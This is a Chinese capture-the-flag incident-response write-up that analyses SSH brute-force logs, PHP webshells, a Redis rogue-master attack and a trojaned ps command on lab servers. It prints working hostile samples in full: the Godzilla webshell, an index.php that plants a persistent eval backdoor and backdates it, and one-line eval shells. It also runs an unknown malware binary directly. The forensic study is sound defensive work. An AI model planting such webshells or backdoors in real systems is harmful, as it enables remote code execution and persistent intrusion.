玄机打靶日记
第一章 应急响应-Linux日志分析
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用",“分割
查看/var/log目录下的auth.log*
发现有
1
|
Failed password for root
|
grep一下
1
|
cat /var/log/auth.log* | grep -a "Failed password for root"
|
找到三个ip
1
|
flag{192.168.200.2,192.168.200.31,192.168.200.32}
|
2.ssh爆破成功登陆的IP是多少,如果有多个使用”,“分割
前下看到有下面这个字段
1
|
Accepted password for root
|
grep一下
1
|
cat /var/log/auth.log* | grep -a "Accepted password for root"
|
排除自己的ip
3.爆破用户名字典是什么?如果有多个使用”,“分割
先过滤Failed password
1
|
cat /var/log/auth.log* | grep -a "Failed password"
|
对结果进行清洗
1
|
grep -a "Failed password" /var/log/auth.log.2|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
|
sort -nr是逆序排序
uniq -c统计重复行的次数,输出重复次数和内容
for(.*?) from正则匹配for和from中间字段
print "$1\n"输出匹配的第一个字符
while($_=<>)逐行读取grep后的信息
1
|
cat /var/log/auth.log* | grep -a "Failed password" | awk -F 'for ' '{print $2}' | awk -F ' from' '{print $1}' | sed 's/invalid user//g' | sed 's/^[ \t]*//;s/[ \t]*$//' | grep -v '^$' | uniq -c | sort -nr
|
这里$1前面有-F参数,含义变为输出from前的字符,$2前面也有,含义变为输出for后的字符
sed作用去除制表符和指定的字符
1
|
flag{user,hello,root,test3,test2,test1}
|
4.登陆成功的IP共爆破了多少次
1
|
cat /var/log/auth.log* | grep -a "Failed password for root" | awk '{print $11}' | sort -n | uniq -c
|
或者直接看(
1
|
cat /var/log/auth.log* | grep -a "Failed password for root from 192.168.200.2"
|
5.黑客登陆主机后新建了一个后门用户,用户名是多少
前下查看日志看到useradd
grep一下
1
|
cat /var/log/auth.log* | grep -a "useradd"
|
其实已经可以看出来了,再grep linux-rz
1
|
cat /var/log/auth.log* | grep -a "useradd" | grep -a "linux-rz"
|
或者直接找new user,或者去找/etc/passwd下的可疑用户
1
|
cat auth.log.1|grep -a "new user"
|
第一章 应急响应-webshell查杀
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
把web目录下的文件下载到本机用D盾扫描
gz.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
|
1
|
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
|
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
一眼哥斯拉
1
|
https://github.com/BeichenDream/Godzilla --> 39392de3218c333f794befef07ac9257
|
1
|
flag{39392de3218c333f794befef07ac9257}
|
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
1
|
/var/www/html/include/Db/.Mysqli.php --> aebac0e58cd6c5fad1695ee4d1ac1919
|
1
|
flag{aebac0e58cd6c5fad1695ee4d1ac1919}
|
4.黑客免杀马完整路径 md5 flag{md5}
其实D盾已经扫出来了,top.php
我们还可以查看access.log,访问的是第七个字符
1
|
cat /var/log/apache2/access.log | awk '{print $7}'|uniq -c
|
1
|
/var/www/html/wap/top.php --> eeff2eabfd9b7a6d26fc1a53d3f7d1de
|
1
|
flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}
|
第一章 应急响应- Linux入侵排查
1.web目录存在木马,请找到木马的密码提交
到web目录下
2.服务器疑似存在不死马,请找到不死马的密码提交
查看文件权限
index.php居然是root权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
|
向shell.php写文件的操作,查pass的MD5hash
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
前面ls的时候看到可以的二进制文件shell(1).elf
微步云沙箱分析
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
上面也可看到监听端口是3333
或者先执行文件,然后netstat查看
1
2
3
|
chmod 777 'shell(1).elf'
./'shell(1).elf'
netstat -antlp
|
第二章日志分析-redis应急响应
通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
初步查看本地没有web服务,我们直接查看/var/log/redis.log日志
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
|
419:M 31 Jul 2023 05:25:31.525 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
419:M 31 Jul 2023 05:25:31.525 # Server initialized
419:M 31 Jul 2023 05:25:31.525 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
419:M 31 Jul 2023 05:25:31.525 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.610 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:15.610 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:16.612 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:16.612 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:16.613 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:17.614 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:17.614 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:17.615 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:18.616 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:18.616 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:18.617 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:19.618 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:19.619 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:19.620 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:20.621 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:20.621 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:20.622 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:21.623 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:21.623 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:21.624 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:22.625 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:22.625 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:22.626 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:23.627 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:23.627 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:23.628 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:24.628 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:24.629 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:24.630 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:25.631 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:25.631 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:25.632 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:26.633 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:26.633 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:26.634 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:27.635 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:27.635 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:27.636 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:28.637 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:28.637 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:28.638 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:29.639 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:29.639 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:29.640 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:30.641 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:30.641 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:30.642 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:31.643 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:31.643 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:31.644 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:32.644 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:32.645 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:32.645 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:33.647 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:33.647 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:33.648 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:34.649 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:34.650 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:34.650 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:35.652 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:35.653 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:35.653 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:36.656 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:36.656 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:36.656 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:37.659 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:37.659 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:37.659 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:38.661 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:38.662 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:38.662 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:39.664 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:39.665 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:39.666 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:40.667 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:40.668 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:40.668 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:41.670 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:41.671 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:41.671 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:42.674 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:42.674 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:42.675 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:43.676 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:43.676 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:43.676 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:44.679 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:44.679 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:44.680 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:45.681 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:45.681 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:45.682 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:46.683 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:46.683 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:46.684 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:47.685 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:47.685 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:47.686 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:48.687 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:48.687 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:48.688 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:49.689 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:49.690 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:49.691 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:50.692 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:50.692 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:50.693 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:53.698 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:53.698 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:53.699 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:54.700 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:54.700 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:54.701 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:55.702 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:55.702 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:55.702 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:56.704 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:56.705 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:56.705 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:57.707 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:57.708 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:57.708 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:58.709 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:58.709 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:58.710 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:59.711 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:59.712 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:59.712 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:00.715 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:00.715 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:00.715 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:01.717 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:01.717 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:01.718 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:02.719 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:02.719 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:02.720 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
419:S 31 Jul 2023 05:34:35.194 * Trying a partial resynchronization (request 7a73a1a4297a16c50d8465b0cc432444f0e5df71:1).
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
419:M 31 Jul 2023 05:42:00.685 * DB saved on disk
419:M 31 Jul 2023 05:42:42.213 * DB saved on disk
419:M 31 Jul 2023 06:06:44.597 # User requested shutdown...
419:M 31 Jul 2023 06:06:44.597 * Saving the final RDB snapshot before exiting.
419:M 31 Jul 2023 06:06:44.599 * DB saved on disk
419:M 31 Jul 2023 06:06:44.599 * Removing the pid file.
419:M 31 Jul 2023 06:06:44.599 # Redis is now ready to exit, bye bye...
441:C 31 Jul 2023 06:10:29.635 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
441:C 31 Jul 2023 06:10:29.640 # Redis version=5.0.1, bits=64, commit=00000000, modified=0, pid=441, just started
441:C 31 Jul 2023 06:10:29.640 # Configuration loaded
441:M 31 Jul 2023 06:10:29.643 * Increased maximum number of open files to 10032 (it was originally set to 1024).
|
发现这里跟所有日志都不一样,是进行了主从复制攻击,并且可以看到ip
通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;
1
2
3
4
5
6
7
8
9
10
11
12
13
|
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
|
这里看到这条
1
|
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
|
所以恶意文件就是exp.so
用工具把他传出来,然后丢到IDA里面分析,已知是flag字符串
我们直接shift+F12调出string,然后查找flag
1
|
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
|
通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;
可以直接看日志前面的大量相同ip,跟精确一点要分析exp.so,或者分析
对于redis数据库提权一般来说有4种方法
- 写密钥ssh
- 计划任务
- 反弹shell
- CVE-2022-0543 沙盒绕过命令执行 (集成在template当中)
这里面可以先排除反弹shell与CVE-2022-0543 因为反弹shell很容易出问题导致连接失败。
可以查看定时任务
其实查看ida
可以发现是反弹shell,在机子上找到linpeass.sh,同样可以找到反弹shell的定时任务
通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
root@ip-10-0-10-3:~# ls -al
total 28
drwx------ 3 root root 4096 Aug 1 2023 .
drwxr-xr-x 18 root root 4096 Jul 22 02:43 ..
-rw------- 1 root root 7 Aug 1 2023 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 75 Jul 31 2023 .selected_editor
drwx------ 2 root root 4096 Jul 31 2023 .ssh
root@ip-10-0-10-3:~# ls -al .ssh
total 12
drwx------ 2 root root 4096 Jul 31 2023 .
drwx------ 3 root root 4096 Aug 1 2023 ..
-rw-r--r-- 1 root root 675 Jul 31 2023 authorized_keys
root@ip-10-0-10-3:~# cat .ssh/authorized_keys
REDIS0009 redis-ver5.0.1
redis-bitsetOused-memXU
𮤭preamble~shB9
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user
|
得到用户名xj-test-user,然后github溯源https://github.com/xj-test-user
找到https://github.com/xj-test-user/redis-rogue-getshell这个redis攻击工具的仓库
查看历史提交记录https://github.com/xj-test-user/redis-rogue-getshell/commit/main
1
|
flag{xj-test-user-wow-you-find-flag}
|
通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;
查看bin目录下的所有文件,发现ps命令异常的小
1
2
|
-rwxrwxrwx 1 root root 178 Jul 31 2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31 2023 ps_
|
查看/usr/bin/ps
1
2
3
4
5
6
7
8
9
10
11
|
root@ip-10-0-10-3:~# cat /usr/bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
|
所以flag
1
|
flag{c195i2923381905517d818e313792d196}
|
第二章日志分析-mysql应急响应
1.黑客第一次写入的shell flag{关键字符串}
进入web目录,
找到
1
2
|
1 2 <?php @eval($_POST['a']);?> 4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b
|
所以flag
1
|
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
|
2.黑客反弹shell的ip flag{ip}
既然开启了web服务,我们查看一下web日志
1
|
cat /var/log/apache2/access.log
|
仔细查看,主要是对admin.php进行sql注入的操作
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
192.168.200.2 - - [01/Aug/2023:02:07:50 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3529 "http://192.168.200.31:8005/adminer.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql HTTP/1.1" 200 6607 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
